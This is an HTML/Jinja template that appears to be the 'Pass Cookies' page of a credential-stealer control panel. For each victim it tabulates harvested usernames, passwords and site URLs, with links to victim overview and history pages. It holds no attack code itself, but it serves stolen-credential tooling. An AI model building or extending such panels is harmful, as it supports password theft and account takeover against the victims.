<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/static/passcookies.css">
    <link rel="stylesheet" href="https://cdn.datatables.net/1.11.5/css/jquery.dataTables.min.css" />
    <title>Password Cookies - User Settings</title>
</head>
<body>
    <div class="container">
        <div class="sidebar">
            <div class="admin-profile">
                <div class="profile-image">
                    <img src="/static/image/admin-profil.jpg" alt="Admin Profile Picture">
                </div>
                <h2>{{ victim.username }}</h2>
            </div>
            <div class="sidebar-nav">
                <a class="nav-item" href="/overview?id={{ victim.id }}">Overview</a>
                <a class="nav-item" href="/history?id={{ victim.id }}">History</a>
                <a class="nav-item active" href="/passcookies?id={{ victim.id }}">Pass Cookies</a>
            </div>
            <div class="back-section">
                <a href="/victim" class="back-btn">
                    <img src="/static/image/logout-icon.png" alt="Back Icon" class="back-icon">
                    Back
                </a>
            </div>
        </div>
        
        <main>
            <h1>Password Cookies</h1>
            <div class="info-grid">
                <table id="cookiesTable" class="display dataTable" style="width:100%">
                    <thead>
                        <tr>
                            <th>Username</th>
                            <th>Password</th>
                            <th>URL</th>
                        </tr>
                    </thead>
                    <tbody>
                        {% set urls = victim_data.url.split('\n') %}
                        {% set usernames = victim_data.usernames.split('\n') %}
                        {% set passwords = victim_data.passwords.split('\n') %}

                        {% for i in range(urls|length) %}
                        <tr>
                            <td>{{ usernames[i] }}</td>
                            <td>{{ passwords[i] }}</td>
                            <td><a href="{{ urls[i] }}" target="_blank">{{ urls[i] }}</a></td>
                        </tr>
                        {% endfor %}
                    </tbody>
                </table>
            </div>
        </main>
    </div>

    <div class="logo">
                <img src="/static/image/Logo PBL.png" alt="FBL Logo">
            </div>
        </div>
    </div>

    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="https://cdn.datatables.net/1.11.5/js/jquery.dataTables.min.js"></script>
    <script>
        $(document).ready(function() {
            $('#cookiesTable').DataTable({
                responsive: true,
                order: [[0, 'asc']]
            });
        });
    </script>
</body>
</html>
